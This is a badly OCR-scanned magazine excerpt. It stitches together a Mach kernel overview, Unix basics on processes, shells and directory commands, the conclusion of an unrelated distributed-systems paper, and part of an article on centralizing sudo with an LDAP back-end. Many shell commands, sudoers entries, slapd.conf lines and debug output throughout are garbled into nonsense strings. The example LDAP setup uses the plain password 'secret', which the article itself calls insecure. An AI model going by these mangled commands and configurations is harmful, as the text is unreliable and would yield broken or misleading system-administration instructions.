stractions: 


A task is an execution environment in 
which threads may run. It is the basic unit of 
resource allocation. A task includes a paged 
virtual address space and protected access to 
system resources (such as processors, port 
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capabilities and virtual memory). The UNIX no- 
tion of a process is, in Mach, represented by a 
task with a single thread of control. 


A thread is the basic unit of CPU utiliza- 
tion. It is roughly equivalent to an independent 
program counter operating within a task. All 
threads within a task share access to all task 
resources. 


° A port is a communication channel — logi- 
cally a queue for messages protected by the 
kernel. Ports are the reference objects of the 
Mach design. They are used in much the 
same way that object references could be 
used in an object oriented system. Send and 
Receive are the fundamental primitive opera- 
tions on ports. 


° A message is a typed collection of data 
objects used in communication between 
threads. Messages may be of any size and 
may contain pointers and typed capabilities 
for ports. 


Operations on objects other than messages 
are performed by sending messages to ports 
which are used to represent them. The act of 
creating a task or thread, for example, returns 
access rights to the port which represents the 
new object and which can be used to manipu- 
late it. The Mach kernel acts in that case as a 
server which implements task and thread ob- 
jects. It receives incoming messages on task 
and threads ports and performs the requested 
operation on the appropriate object. This al- 
lows a thread to suspend another thread by 
sending a suspend message to that thread’s 
thread port even if the requesting thread is on 


another node in a network. 


MAGAZINE 


The design of Mach draws heavily on CMU’s 
previous experience with the Accent [4] net- 
work operating system, extending that sys- 
tem’'s facilities into the multiprocessor domain: 


° The underlying port mechanism for com- 
munication provides support for object-style 
access to resources and capability based pro- 
tection as well as network transparency, 


° All systems abstractions allow extensibil- 
ity both to multiprocessors and to networks of 
uniprocessor or multiprocessor nodes, 


° Support for parallelism (in the form of 
tasks with shared memory and threads) al- 
lows for a wide range of tightly coupled and 
loosely coupled multiprocessors and 


° Access to virtual memory is simple, inte- 
grated with message passing, and introduces 
no arbitrary restrictions on allocation, dealloca- 
tion and virtual copy operations and yet allows 
both copy-on-write and read-write sharing. 


The Mach abstractions were chosen not only 
for their simplicity but also for performance 
reasons. A performance evaluation study 
done on Accent demonstrated the substantial 
performance benefits gained by integrating vir- 
tual memory management and interprocess 
communication. Using similar virtual memory 
and IPC primitives, Accent was able to 
achieve performance comparable to UNIX sys- 
tems on equivalent hardware [5] 


Accessing A Unix System 


There are many ways that you can access a 
UNIX system. If you want the fullest possible 
access to the computer's commands and ultili- 
ties, you must initiate a login session. The 
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main mode of initiating a login session to a 
UNIX machine is through a terminal, which 
usually includes a keyboard, and a video moni- 
tor. When a terminal establishes a connection 
to the UNIX system, the UNIX kernel runs a 
process called a tty to accept input from the 
terminal, and send output to the terminal. 
When the tty process is created, it must be 
told the capabilities of the terminal, so it can 
correctly read from, and write to, the terminal. 
lf the tty process receives incorrect informa- 
tion about the terminal type, unexpected re- 
sults can occur. 


The Unix Processes 


A process is the flow of execution of a set of 
program instructions and owns, as a system 
entity, the necessary resources. Some operat- 
ing systems, such as z/OS, call the basic unit 
of execution a job or task. In UNIX, it is called 
a process. In the UNIX kernel, anything that is 
done, other than autonomous operations, is 
done by a process that issues system calls. 
Processes often spawn other child processes, 
using, for instance, the fork() system call, 
which usually run in parallel with their parent 
process. These are usually subtasks which, 
when they are finished, terminate themselves. 
All UNIX processes have an owner. Typically, 
the human owner of a process is the owner of 
the account whose login process spawned the 
initial process parent of the process chain cur- 
rently executing. The child process inherits 
the file access and execution privileges be- 
longing to the parent. 
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Signals 


signals are designed for processes to commu- 
nicate with each other and with the kernel. 
The signalling capability is provided by the op- 
erating system and is used, for instance, to in- 
form processes of unexpected external 
events, such as a timeout or forced termina- 
tion of a process. A signal consists of a pre- 
scribed message with a default action embed- 
ded in it. There are different types of signals in 
UNIX, and each type is identified with a num- 
ber. 


Console 


Every UNIX system has a main console that 
is connected directly to the machine. The con- 
sole is a special type of terminal that is recog- 
nized when the system is started. Some Unix 
system operations must be performed at the 
console. Typically, the console is only accessi- 
ble by the system operators and administra- 
tors. 


Dumb Terminals 


some terminals are referred to as “dumb” ter- 
minals because they have only the minimum 
amount of power required to send characters 
as input to the UNIX system, and receive char- 
acters as output from the UNIX system. Per- 
sonal computers are often used to emulate 
dumb terminals, so that they can be con- 
nected to a UNIX system. Dumb terminals 
can be connected directly to a UNIX machine, 
or may be connected remotely, through a mo- 
dem, a terminal server, or other network con- 
nection. 
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Smart Terminals 


Smart terminals, like the X terminal, can inter- 
act with the UNIX system at a higher level. 
smart terminals have enough on-board mem- 
ory and processing power to support graphi- 
cal interfaces. The interaction between a 
smart terminal and a UNIX system can go be- 
yond simple characters to include icons, win- 
dows, menus, and mouse actions. 


Network-Based Access Modes 


UNIX computers were designed early in their 
history to be network-aware. The fact that 
UNIX computers were prevalent in academic 
and research environments led to their broad 
use in the implementation of the Department 
of Defense’s Advanced Research Projects Ad- 
ministration (DARPA) computer network. The 
DARPA network laid the foundations for the 
Internet. 


FTP 


The FIP (File Transfer Protocol) provides a 
simple means of transferring files to and from 
a UNIX computer. FTP access to a UNIX ma- 
chine may be authenticated by means of a us- 
ername and password pair, or may be anony- 
mous. An FTP session provides the user with 
a limited set of commands with which to ma- 
nipulate and transfer files. 


TELNET 


Telnet is a means by which one can initiate a 
UNIX shell login across the Internet. The nor- 
mal login procedure takes place when the tel- 
net session is initiated. 
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HTTP 


The HTTP protocol has become important in 
recent years because it is the primary way in 
which the documents that constitute the World 
Wide Web are served. HTTP servers are most 
often publicly accessible. In some cases, ac- 
cess to documents provided by HTTP servers 
will require some form of authentication. 


HTTPS 


A variation of HTTP that is likely to become in- 
creasingly important in the future. The °S’ 
stands for “secure.” When communications 
are initiated via the HITPS protocol, the 
sender and recipient use an encryption 
scheme for the information to be exchanged. 
When the sending computer transmits the 
message, the information is encrypted so that 
outside parties cannot examine it. Once the 
message is received by the destination ma- 
chine, decryption restores the original informa- 
tion. 


SHELLS 
Processes operate in the context of a shell. 
The shell is a command interpreter which: 


° Interprets built in characters, variables 
and commands 


° Passes the results on to the kernel. The 
kernel is the lowest level of software running. 
It controls access to all hardware in the com- 
puter. 


sh: Bourne Shell 


_ Developed by Stephen Bourne at AT&T Bell 
Labs 
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csh: C Shell 


_ Developed by Bill Joy at University of Califor- 
nia, Berkeley 


ksh: Korn Shell 
_ Developed by David Korn at AT&T Bell Labs 


_ backward-compatible with the Bourne shell 
and includes many features of the C shell 


bash: Bourne Again Shell 


_ Developed by Brian Fox for the GNU Pro- 
ject as a free software replacement for the 
Bourne shell (sh) 


_ Default Shell on Linux and Mac OSX 


_ The name is also descriptive of what it did, 
bashing together the features of sh, csh and 
ksh 


tcsh: TENEX C Shell 


_ Developed by Ken Greer at Carnegie Mel- 
lon University 


_ It is essentially the C shell with programma- 
ble command line completion, command-line 
editing, and a few other features 
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There are many shells! Common features that 
all shells have: 


¢ Command execution. 

¢ Redirection of input and output. 
¢ Piping. 

¢ Wildcard expansion. 

¢ Process control. 

¢ Command recall and editing. 


¢ Turing-complete (except for the memory 
part). 


Shell scripts 


The basic concept of a shell script is a list of 
commands, which are listed in the order of 
execution. A good shell script will have com- 
ments, preceded by a pound sign, #, describ- 
ing the steps. There are conditional tests, 
such as value A is greater than value B, loops 
allowing us to go through massive amounts of 
data, files to read and store data, and vari- 
ables to read and store data, and the script 
may include functions. We are going to write a 
lot of scripts in the next several hundred 
pages, and we should always start with a 
clear goal in mind. By clear goal, we have a 
specific purpose for this script, and we have a 
set of expected results. We will also hit on 
some tips, tricks, and, of course, the gotchas 
in solving a challenge one way as opposed to 
another to get the same result. All techniques 
are not created equal. Shell scripts and func- 
tions are both interpreted. This means they 
are not compiled. Both shell scripts and func- 
tions are ASCII text that is read by the Korn 
shell command interpreter. When we execute 
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a shell script, or function, a command inter- 
preter goes through the ASCII text line by line, 
loop by loop, and test by test and executes 
each statement, as each line is reached from 
the top to the bottom. 


Shells contain: 

¢ Variables 

¢ Loops 

¢ Conditional statements 

¢ Input and Output 

¢ Built in commands 

¢ Ability to write functions 

¢ Specifying the shell to be used: 
¢ On the first line of the file: 
¢ Implicitly 

¢ blank line — Bourne shell 
¢#in column 1 — C shell 

¢ Explicitly 

¢ #!/bin/sh — Bourne shell 


¢ #!/bin/csh — C shell 
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After logging into the system, the current directory is your home directory. So for the account 
stu01 the current directory would be: 


eons / Se ticasmecs/ Sawa 


To view what the current directory is, use the pwd command: 


S pwd 


To create a new directory off of the home directory uses the command mkdir. 


Sy jaqiicenlie aeveuioliiie 


To view a listing of the contents of the current directory use the command Is. 


Ss ile 


For a directory listing that gives more information use the command: 


S ibs oi 


To view hidden files those don't normally show up with an Is use the command: 


Se Je ike 


To change the current directory to the new directory that was just created use the change direc- 
tory command 


EXO! 


S cd newdir 


The newdir directory is down one level in the tree from the home directory for stu01. 


.Check to see what directory is current: 


S pwd 
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In this directory, files could be stored or additional sub directories could be created. 


To move back up one directory use the command: 


S el se 


The dot dot represents the current directory. 


To rename a directory use the move command mv. 


S aie (venice iaVviinaeiinl= 


The Unix File System 


The UNIX file system hosts the collection of files accessed by the processes running in the sys- 
tem and is in charge of the logical representation of the data to the requesting entities. The file 
system has therefore both a logical and physical dimension. 


The logical file system 


The logical file system is in charge of the hierarchy of connected directories and files as they are 
shown to the users. The UNIX file system is logically arranged as a tree, actually inverted with the 
root, named “/”, at the top. All files are logically contained within the root directory. See the exam- 
ple shown in Figure 4, where the shaded boxes represent directories, while the unshaded boxes 
represent files. A file or directory is located in the file system tree using a “path name’; 


fetc/profile or /u/dirA/dirAl/Dominique 


are path names. Note that UNIX is a case-sensitive operating system; therefore a file called “ BC” 
is different from a file called “abc”. 
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/u/dirA/dirAl | 


/u/dirA/dirAl/Dominique /u/dirA/dirAl/Finn 


Figure 4. Logical File System. 


The physical file system 


The physical file system, as the name implies, 
is in charge of the physical arrangement of 
data and control information about the physi- 
cal media. The physical file system operates 
with control blocks such as the superblock, 
inodes, and data blocks. The superblock 
holds the control information for the system. 
Inodes contain similar information for individ- 
ual files. The data blocks hold the data that 
makes up the information in the files. 


Conclusion 


UNIX provides bothappropriate semantics for 
a general-purpose distributed system and ap- 
propriate mechanisms and interfaces for this 
system to be constructed merely by adding a 
comparatively simple transparent subsystem 
to UNIX. The design philosophy we employed 
was, at the outset, little more than an active 
concern for structure and generality, and, 


/u/dirA/dirA2 
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more particularly, a liking for recur- 
sive constructs (dating back to 
work at Newcastle on recursive vir- 
tual machines [6], if earlier). How- 
ever, aS a result of our work on the 
Connection, these ideas on recur- 
sive system structuring have be- 
come much more well defined, in 
our own minds at least, and have 
enabled us to separate carefully is- 
sues concerned with constructing a 
distributed system from those con- 
cerned with taking advantage of 
the fact that It is distributed, for ex- 
ample, in order to provide increased 
reliability, availability, and/or security. This is 
not to say that we have simply ignored all 
such issues. Rather we have investigated, 
and in several cases already implemented, 
various separate but complementary reliability 
and security mechanisms, each of which can 
simply be added to a UNIX United system, 
without requiring modifications to the code of 
either UNIX or the Connection [7], [8], and [9]. 
(This work is surveyed in [10], as part of a gen- 
eral account of our ideas on recursive structur- 


ing.) 


lt would be inappropriate to end these conclud- 
ing remarks without an explicit acknowledg- 
ment of our debt to UNIX and its original crea- 
tors—it has its deficiencies, of course, both as 
a centralized system, and as the basis of a 
general-purpose distributed system. Neverthe- 
less, we have found its facilities, particularly at 
the system call level, and the style of system 
design that it exemplifies a veritable inspira- 
tion. Such simplicity and generality of mecha- 
nism as we have been able to achieve un- 


doubtedly owes much to this source. 
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Best Practices 
in UNIX Access Control with SUDO 


by Leonardo Neves Bernardo 


This article will discuss security related issues in sudo envi- 
ronments and evaluate advantages and disadvantages of 
centralizing sudo with LDAP back-end. Another issue sum- 
marized in this article is about taking care with content of 
sudo registers. 


= ay aa = ~ —_— : == = = —— = = _— = 
es — = rs ee EEE Ss SS j aS ne — aS ee OS SS CSO = ea a en el 
<a SE! ae 3 es ee = = =i = = - — = = 7 


What will you learn? What should you know’? 

° how to use sudo to improve Unix environ- ° basic understanding of LDAP services 
ment security. and protocol. 

° how to centralize sudo authorization with ¢ basics of Linux shell. 


LDAP back-end. 


° how to avoid some sudo bad configura- 
tions. 


In the early days of UNIX, there were only two kinds of users: administrators and common users. 
Until now, this structure remained in the same model. Nevertheless, in our day by day activity, it is 
very common to meet some situations where it is necessary to delegate some responsibilities to 
operational groups and others, who are not administrators nor common users. Some administra- 
tors do some insecure techniques like: sharing of root passwords, creation of users with uid 0, 
changes in file permission, and so on. These techniques are a solution for the immediate prob- 
lem, but don't follow the least privilege principle. 
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Around 1972, the notable Dennis Ritchie invented the setuid bit. The setuid bit allows users to run 
an executable with the permissions of the executable’s owner. The most common situation is 
when an executable is owned by root. Programs must be carefully designed when the setuid bit 
permission is enabled, because vulnerable applications allow an attacker to execute arbitrary 
code under the rights of the process being exploited. After setuid bit creation, the division be- 
tween root and other users starts to be broken. Unfortunately, to take advantage of this feature, it 
is necessary to rewrite the programs. 


Around 1980, Bob Coggeshall and Cliff Spencer wrote Substitute User DO, or SUDO, one setuid 
program to run other programs without the necessity of these programs being rewritten. Sudo be- 
came the most used tool for privilege escalation in the UNIX environment. Sudo is under constant 
development. Security concerns are very important in sudo and sometimes vulnerabilities are dis- 
covered and corrected immediately. 


Basics about /etc/sudoers 
The sudoers file is composed of three sections: defaults, aliases and user specifications. 
Defaults 


Defaults defines options to be used in every sudo entry. It's possible to overwrite options in each 
entry. We will discuss a little about some options ahead in this article. 


Aliases 


Aliases are variables used to group names. There are four types of aliases: User Alias, Run- 
as Alias, Host Alias and Cmnd_ Alias. The name of an alias must start with an uppercase letter. 
Let's explain a little about each alias: 


ls used to define a group of users, for example: 


Weve llalers: (ESI SIEMN SCS) 3 iWISieiely, UiSioneZ 


You've probably realized UNIX has groups of users stored in the UNIX group of users (NSS 
group database) and there is no needed to redefine those groups again. To use a UNIX group in- 
side sudo, you need to append % in the register. In the following example, the UNIX group web- 
masters can be used inside sudoers as WEBMASTERS: 


User Alias WEBMASTERS = swebmasters 
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Runas_ Alias 


Is used to define group target users. Root is not always the target user, it's possible to use other 
users. 
Runas_ Alias is used to group them. Example: 


cliches) JE Islets! ON NIUGINS. = (Cleleieeleeueik. jo SiesveCuc 2 


Host_Alias 


/etc/sudoers is prepared to be distributed among hosts. Hostnames, IP addresses and other kind 
of addresses are grouped in Host Alias. Like User Alias, its possible to use a UNIX group of 
hosts, called netgroup (NSS netgroup database). Netgroup is not very common, but is useful for 
big environments. To use UNIX netgroup inside sudo, you need to append + in the register. In the 
following example, a UNIX netgroup webservers can be used inside sudoers as WEBSERVERS: 


lovee bass). Mere S ih Vihleys). = SepiSlomoiowioucs 


There are others possibilities to use Host_Allias, like lists of hostnames or IP addresses: 


ahOisie JILIels INES Vides = cere ik, InovsieZ 


Host Alias WEBSERVER = 192.168.0.1, 172.16.0.0/16 


Cmnd_Alias 
For each type of alias, there is one name built-in called ALL. It’s possible to use sudo without any 
aliases, but aliases are recommended if you intend to use /etc/sudoers. 

user host = (runas) command [,command,..| 

user can be user, UNIX group prepending with oie lWisvoie dbavels 

INOVENE, (Cielic, AS IMOSIER. INSIECNEOUIe jencisieroiieliiate, WEliclgk ar YoIe daleyse. Adlalers 


runas can be user or group of user and unix group 


User Specifications 


Gimarel vibakevs! uso Ulors: ierolinisuaels) aliaisikelS. dlabsiesj, lp<siiijeiltS eke “CaMatel filers 


CmnaAlias PRINTING= /usr/sbin/lpc, /usr/bin/lprm 
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At the end of the sudoers file, there are user specification entries. The sudoers user specification 
is in the following form: 


command can be a command, list of commands divided by 


comma or Cmnd Alias. command support wildcards. 


Let's see an example of user specification: 


1@@ 1s ALL = (ALL) ALL 


In the above example, one user entry is shown which permits the root user to run all commands 
(last ALL), in all hosts (first ALL), becoming all users (ALL inside parenthesis) when running a 
command. 


neves neves-laptop = (root) /usr/sbin/useradd 


The following example is more restrictive than the first example: 


8 ese SSleniiay) OS iecielel iene” 


useradd: cannot lock /etc/passwd; try again later. 


In this case, the user neves has permission to run the command /usr/sbin/useradd as user root in 
host neves-laptop only. As you can see, the second example is more adapted to the least privi- 
lege principle. 


S Siecle “sie Slosnay/ wieeiecicle! ines 2 


[sudo] password for neves: 


Let's go to see the result when user neves runs a command directly: 
User neves doesnt have access to add a user directly, but with sudo it could be possible: 


This is a typical use of sudo and now it is possible to delegate some activities for the operators 
group. By default, sudo requests the user password and maintains the user password in cache 
for five minutes. 
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Let's see a little more complex example using aliases: 


Wistee JNlalelsy (OU EvIMOIS, = Ieee, Mewes 
aise, Sulavels) IDMSICCIS, = inks ves a eloeeici, IS ves lcci eoZ 


Cmnd Alias MNGUSERSCMDS = /usr/sbin/userdel, /usr/sbin/useradd, /usr/ 


SN eaLiay USS. 


OPBRRATORS DESKTOPS= (ALL) MNGUSERSCMDS 


Now, beyond useradd command, user neves is allowed to run usermod and useradd commands 
and sudoers Is organized with aliases. 


To manage /etc/sudoers, it is strongly recommended to use the visudo command. The advantage 
of the use of visudo is that it assures sudo syntax is correct before allowing one to save the sudo- 
ers file. 


We've seen a little about file /etc/sudoers. Almost all environments use this way to control sudo 
and it is okay for standalone servers or small environments. We will see that file sudoers is not 
the best configuration for big and medium size networks. 


Common situations about sudoers distribution 


Although it’s possible to use /etc/sudoers setup in a per-host basis, sudo doesn't have any built-in 
way to distribute the /etc/sudoers file among servers. It's very common in some companies that 
some team is in charge of operating and distributing /etc/sudoers. In another companies, there 
are scripts using version control (cvs, svn, etc), transfer commands (rsync, rdist, rcp, scp, ftp, 
wget, curl, etc.) or file share (nfs, netbios, etc.) to distribute /etc/sudoers. Although the use of 
scripts is better than manual operation, there are a lot of security issues to be considered in this 
case. There are some questions that need to be answered: 


Are Changes in /etc/sudoers audited? 


Imagine one attacker using sudo to get root access to your environment. It’s important to think 
about which information you have in your log when something like that happens. 


Do operators or scripts need root access to change /etc/sudoers? 


lf you are using a push strategy to distribute /etc/sudoers, then probably the source will have 
rights to change destination servers, as the usual, with root access. In the worst case, with push 
strategy, you probably created one unique point where it is possible to get root access to entire 


environment. 
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Is the source of /etc/sudoers trusted? 


Instead of a push strategy, perhaps you are using a pull strategy. In this case, all servers are get- 
ting /etc/sudoers from one central point. There are two major concerns in a pull strategy; first, it's 
necessary to protect from man in middle attacks and second is to raise security level of central 
point. 


In general, pull is the best strategy to deploy sudoers files, because security problems don't com- 
promise the entire environment. If you use one software of configuration management, like pup- 
pet or cfengine, to distribute sudoers and protect the configuration management server, your envi- 
ronment probably has a reasonable level of security. Even so, the pull strategy with configuration 
management lacks real time updates and sometimes lacks an auditing of changes in sudoers 
files. 


Using back-end LDAP 


Now let's discuss the current best way to use sudo. With an LDAP back-end, sudo becomes a 
client-server service. For each use of sudo, the LDAP server will be consulted. We join the best 
advantages of LDAP and the best advantages of sudo to create one authorization system for 
UNIX environment. 


Advantages of LDAP 

some advantages to using LDAP as a sudo back-end are: 

° LDAP protocol is standards-based 

° If well structured with replication servers, you will have a high availability service 
° There are access control lists (ACLs) 

° It's possible to audit all changes and all consults 


° LDAP is cross-platform, it's possible even to change from one server to another completely 
different one (e.g.: from openldap to Microsoft active directory) 


° LDAP is very fast for search operations (almost all commands in sudo service) 
° It's possible to use cryptography/TLS as requirement 


Beyond these advantages, maybe the most important security consideration is that it is not neces- 
sary to open a security breach to distribute the sudoers file. 


123 


BSD 


MAGAZINE 


| don't think it’s necessary to restate the importance of protecting your LDAP server(s). Some ba- 
sic actions, like using a firewall, TLS and putting LDAP servers in segregated network, are out- 
side the scope of this article. If you have a non protected LDAP environment, it is probably better 
to use another strategy. 


Creating LDAP structure 


We will explain how to build one basic LDAP server (OpenLDAP) to store sudo information. We 
will use OpenLDAP software, because OpenLDAP is the most widely known LDAP server distrib- 
uted as open software. The procedures are about compilation of OpenLDAP, but if you prefer, you 
could install by package manager and achieve the same results. If you have one OpenLDAP 
server running, it is possible for you to jump to next topic. You could use another LDAP server be- 
sides openldap, but we won't explain about this, please look for information in sudo documenta- 
tion. 


First of all, download the latest release of the Berkeley DB from the Oracle site 
(www.oracle.com/technetwork/database/berkeleydb) and the latest version of OpenLDAP from 
the OpenLDAP site (www.openldap.org). 


Compiling and installing Berkeley DB: 


# tar -zxvf db-4.8.30.NC.tar.gz 


# cd db-4.8.30.NC/build unix/ 


# ../dist/configure && make && make install 


OpenLDAP needs to find Berkeley DB before compilation: 


export CFLAGS="-I/usr/local/BerkeleyDB.4.8/include” 
export CPPFLAGS="-I/usr/local/BerkeleyDB.4.8/include” 
export LDFLAGS="-L/usr/local/BerkeleyDB.4.8/1ib” 


export LD LIBRARY PATH="/usr/local/BerkeleyDB.4.8/lib” 
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Compiling and installing OpenLDAP: 


# tar -zxvf openldap-2.4.26.tgz 
# cd openldap-2.4.26 


# ./configure && make depend && make install 


Let's start with a minimal OpenLDAP configuration file. Create with 


a/usr/local/etc/openldap/slapd.conf _— 
Listing 1 content. 


Listing 1. Minimal slapd.conf 

#Slapd.conf file 

include /usr/local/etc/openldap/schema/core.schema 
pidfile | bisvie, Were syily vere, aebnew sis Leyexe| fie) idel 


argsfile /usr/local/var/run/slapd.args 


database lelele 

SHUNEIE aL "dc=example, dc=com" 

iO Oxte ChTl "cn=admin, dc=example, dc=com" 
rootpw SeCicet 

elinasrel elena, /var/lib/ldap 


index objectClass eg 


UNIX 


Listing 2. Base Idif 

#toase.ldif 

dn: dc=example, dc=com 
objectClass: dcObject 
objectClass: organization 
dc: example 


Oo: example 


dn: cn=admin, dc=example, dc=com 
OQ omSewe Leis s yeereigy Ae Ee Lepave! Live) Ie 


Gia <sieliqalial 


And finally, start LDAP server with the command: 


ip (een dbevere\ IL Ialoesxaiey suleyorelie (Cl leah. tsa, S10) ING Jebit del “bie\aio/ 


OpenLDAP will bind TCP port 389, verify with netstat command: 


# netstat -an | grep 389 
tcp O OF (haha dlls iO eko! © LISTEN 


EeDo 0 Ch ee eesrere ee LISTEN 


The next step is to create the root of your LDAP tree. Create one file named base. |dif with Listing 
2 content. 


UNIX 


Add content with the command Idapadd: 


# ldapadd -D”cn=admin, dc=example,dc=com” -w”secret” -f base.ldif 


adding new entry ,dc=example, dc=com” 


adding new entry ,,cn=admin, dc=example,dc=com”# ../dist/configure && make 
&& make install 


Use ldapsearch to verify functionality of your LDAP directory, as shown in Listing 3. 


If the results are like Listing 3, your OpenLDAP is okay. Remember that there are no security con- 
cerns in this server example. Your LDAP base is dc=example,dc=com, your admin user is cn=a- 
dmin,dc=example,dc=com and your password of admin user is secret. 


Listing 3. Test with ldapsearch 

# ldapsearch -x -b "dc=example,dc=com" -LLL 
dn: dc=example, dc=com 

objectClass: dcObject 

objectClass: organization 

dc: example 


O: example 


dn: cn=admin, dc=example, dc=com 
objectClass: organizationalRole 


ares <eielmuual 
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Listing 4. Slapd.conf with sudo structure 

#Slapd.conf file 

include /usr/local/etc/openldap/schema/core.schema 
include /usr/local/etc/openldap/schema/sudo.schema 
pidfile /usr/local/var/run/slapd.pid 


argsfile /usr/local/var/run/slapd.args 


database isvele 
suffix "dc=example, dc=com" 
© Omen "cn=admin, dc=example, dc=com" 


rootpw SSC ice 


Creating sudo container 


Now it’s necessary to prepare your OpenLDAP to accept sudo information. First step is to include 
the sudo.schema. 


Download the latest stable sudo release source from the sudo site (www.sudo.ws) and copy the 
sudo.schema to the openldap schema directory: 


# tar -zxvf sudo-1.8.2.tar.gz 


# Cp sudo-1.8.2/doc/schema.OpenLDAP /usr/local/etc/openldap/schema/sudo.schema 


Edit slapd.conf to include the sudo.schema and index to sudoUser attribute. Listing 4 shows 
Slapd.conft with information related to sudo. 


# killall slapd 


# /usr/local/libexec/slapd 


Create the file Idif sudo container, with the following content: 


dn: ou=SUDOers, dc=example, dc=com 
objectClass: top 
objectClass: organizationalUnit 


ou: SUDOers 


Add to the directory with Idapadd: 


# I|dapadd -D”cn=admin,dc=example,dc=com” -w”’ secret” -f sudo. |dif 


adding new entry ,ou=SUDOers,dc=example,dc=com”’ 


Your OpenLDAP is okay to control access with sudo. You have two possibilities at this moment, 
migrate your /etc/sudoers or start from Zero. 


Migrating sudoers content 


Usually, the easiest way to migrate sudoers information to LDAP is using a script sudoers2ldif. su- 
doers2ldif is located at plugins/sudoers, from the sudo source. 


To generate Idif file from /etc/sudoers, use the following commands: 


# SUDOERS BASE=ou=SUDOers, dc=example, dc=com 
# export SUDOERS BASE 


# /usr/src/sudo-1.8.2/plugins/sudoers/sudoers2ldif /etc/sudoers > 


Siblekorsies ivekLit 


129 


MAGAZINE 


And importing sudoers.|dif content to LDAP server: 


# ldapadd -D”cn=admin, dc=example,dc=com” -w”secret” -f sudoers.ldif 


adding new entry ,cn=defaults, ou=SUDOers, dc=example, dc=com” 


adding new entry ,cn=root, ou=SUDOers, dc=example, dc=com” 


adding new entry ,cn=OPERATORS, ou=SUDOers, dc=example, dc=com” 


The script sudoers2ldif creates one register called defaults containing the default options and cre- 
ates one LDAP register for each /etc/sudoers entry. Sometimes it’s necessary to correct resulting 
ldif file before importing to LDAP. It happens because, depending your sudoers file, it sometimes 
creates more than one LDAP entry with the same DN (distinguished name). Duplicate DNs aren't 
supported by LDAP protocol. 


LDAP sudoers registers 


First, the difference between /etc/sudoers and sudoers inside LDAP Is that inside LDAP there are 
no aliases. 


First of all, sudo looks for the register cn=defaults and parses it like a Defaults section in /etc/ 
sudoers. The cn=defaults is a list of sudoOptions. 


Other sudo registers, in general, are formed by a combination of attributes sudoHost, sudoUser 
and sudoCommanad. It’s possible to use multiple values in each of these attributes. 


Listing 5 shows one example of sudo LDAP entry. In Listing 5, there is a sudo LDAP register with 
multiples of sudoUser, multiples of sudoHost and multiples of sudoCommanad. It’s possible to use 
attributes sudoRunAs, sudoOption, sudoRunAsUser, sudoRunAsGroup, sudoNotBefore, sudoNo- 
tAfter, sudoOrder. sudoNotBefore and sudoNotAiter are very interesting, because it’s possible to 
define the time that permission Is valid in sudo. 


130 


MAGAZINE 


UNIX 


Listing 5. sudo LDAP entry 


# OPERATORS, SUDOers, example.com 
dn: cn=OPERATORS, ou=SUDOers, dc=example, dc=com 
objectClass: top 

objectClass: sudoRole 

Gigny Iie enw eOinrs 

sudoUser: neves 

sudoUser: neves2 

sudoHost: neves-laptop 

sudoHost: neves-laptop2 
sudoRunAsUser: ALL 

sudoCommand: /usr/sbin/userdel 
sudoCommand: /usr/sbin/useradd 


SbkcloGeulmsiarc,: / blsie/ Sloaiial/ thse mice 


Listing 6. Idap.conf with sudo 

base dc=example, dc=com 

uri ldap://localhost/ 

keke: Wises sear Ss 

SHUIBIGMH SNS) eyevSich, WeVbIe SUI DIOlSiarsi ele Sep,ellime) Ney 16 (e Siereyn| 


SUDOERS DEBUG 1 


Modify /etc/nsswitch.conf and add sudoers backend: 


sudoers: ldap 


Compiling and configuring sudoers LDAP client 


Above 1.6.8 version of sudo, LDAP support is available. Some Linux distributions, like Red Hat, 
now distribute software packages of sudo with LDAP support, but in general, some Unix vendors 
and Linux distributions distribute sudo without LDAP support. 


Let's see how to compile sudo with LDAP and NSS (Name Service Switch). With NSS, sudo will 
be one of NSS databases, like passwd or group. If your UNIX doesn't have NSS support, it’s pos- 
sible to use LDAP support inside sudo, but you need to look at your operating system documenta- 
tion to learn how to use LDAP backends in authentication. 


Download, uncompress and install sudo with LDAP support: 


ip leelic = aoeynt BUBIClG = dl aici, 2 A teele a El 


# cd sudo-1.8.2 


# ./configure --with-ldap && make && make install 


Edit your /etc/Idap.conf using Listing 6 as reference. We will enable SUDOERS_ DEBUG to con- 
firm that our sudo binary is using LDAP back-end. 


And let's test the configuration, as showed in Listing 7. 
In Listing 7, we've seen that sudo consulted LDAP to get information about authorization. Look at 


line: 


sudo: ldap search ‘(| (SsudoUser=neves) (SudoUser=sneves) (sudoUs- 
er=ALL))’ 


Dont forget to remove the SUDOERS_DEBUG line from /etc/Idap.conf. It's recommended to re- 
move the old sudo binary (usually /usr/bin/sudo) and the old /etc/sudoers file. 
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Listing 7. Testing sudo with LDAP 


Ss Suiele (iSite Slovan tSeSicscle) mews 


LDAP Config Summary 


ikeleyern // aboreciLiavesic / 


leleye) “Wieieisaheia 5 


sudoer 


Sink anche ial 


eie= 2b 


S16 CO) = 


S| les SUS) UIDICleang Sy ele Se>.cehie ie (Cle Se rey(i 
(anonymous) 


(anonymous) 


lela: stinaligalellatS (hcl, cletes 7 / vowel ave Sic/ 
Iekeye) ESE IOS Eom = elSlobler 97 410 

Ikeleye. SEI ojeieaveiae jUelelje) “Woiseakoi. = = 

ILeke jo) isevet, Josigvel 210) ele 

Looking for cn=defaults: cn=defaults 

found: cn=defaults, ou=SUDOers, dc=example, dc=com 
ikeeys) Swiel@Cleravel= “Sis ie@cisieic 


ldap search ' (| (SudoUser=neves) (SsudoUser=sneves) (SudoUs- 


> 


searching from base 'ou=SUDOers, dc=example, dc=com' 
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SHONCHS) e 
Siplele) = 
SliGi@r 
Seon 
sudo: 
sudo: 
sudo: 
sudo: 
sudo: 
SUiCle) e 
Soil 
SCO 
sudo: 
SliGi@r 
Suelo 
SuGon 
sudo: 
sudo: 
sudo: 


Se On 


ldap sudoHost 'neves-laptop' ie Gees 
order attribute raw: 3 

order attribute: 3.000000 
result now has 1 entries 
ldap search ' (sudoUser=+*) ' 
searching from base 
adding search result 
result now has 1 entries 

sorting remaining 1 entries 
searching LDAP for sudoers entries 
MATCH! 


ldap sudoRunAsUser ‘ALL' 


ldap sudoCommand '/usr/sbin/userdel' not 
ldap sudoCommand '/usr/sbin/useradd' MATCH! 
ldap sudoCommand '/usr/sbin/usermod' MATCH! 
Command allowed 

Inve ‘evgncieys (bikie S10) 7 c18 
done with LDAP searches 


US Meieelies= 


MONEE, Jameel = Il 


Sialclo. Jueleye: Ierescbier (10) 050i 


Password: 


sudo: 


removing reusable search result 


neves@neves-laptop:~$ 


"ou=SUDOers, dc=example, dc=com' 


Using groups and netgroups to organize sudo registers 


There are no aliases in sudo when we are using LDAP. Aliases are useful to organize registers 
and avoid operation confusion. Its possible to implement the same aliases functionality in NSS 
